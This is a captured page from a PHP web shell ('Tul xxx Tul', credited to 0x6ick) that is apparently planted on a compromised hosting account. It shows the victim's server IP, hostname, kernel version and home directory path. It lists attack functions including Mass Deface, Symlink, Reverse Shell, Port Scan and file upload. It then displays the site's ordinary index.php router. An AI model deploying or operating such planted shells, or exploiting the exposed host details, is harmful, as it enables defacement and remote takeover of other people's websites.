Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
vendefacil2
/
Viewing: index.php
<?php ob_start(); date_default_timezone_set('America/Managua'); require_once 'config/Config.php'; require_once 'config/Helpers.php'; $ruta = (!empty($_GET['url'])) ? $_GET['url'] : ''; if ($ruta === '' || $ruta === '/') { include 'index.html'; exit; } $array = explode('/', $ruta); $controller = ucfirst($array[0]); $metodo = 'index'; $parametro = ''; if (!empty($array[1])) { if ($array[1] != '') { $metodo = $array[1]; } } if (!empty($array[2])) { if ($array[2] != '') { for ($i=2; $i < count($array); $i++) { $parametro .= $array[$i] . ','; } $parametro = trim($parametro, ','); } } require_once 'config/app/Autoload.php'; $dirControllorer = 'controllers/' . $controller . '.php'; if (!file_exists($dirControllorer)) { $files = scandir('controllers'); foreach ($files as $file) { if (strcasecmp($file, $controller . '.php') === 0) { $dirControllorer = 'controllers/' . $file; $controller = str_ireplace('.php', '', $file); break; } } } if (file_exists($dirControllorer)) { require_once $dirControllorer; $controller = new $controller(); if (method_exists($controller, $metodo)) { $controller->$metodo($parametro); }else{ header('Location: ' . BASE_URL . 'principal/errors'); } }else{ header('Location: ' . BASE_URL . 'principal/errors'); }
Coded With 💗 by
0x6ick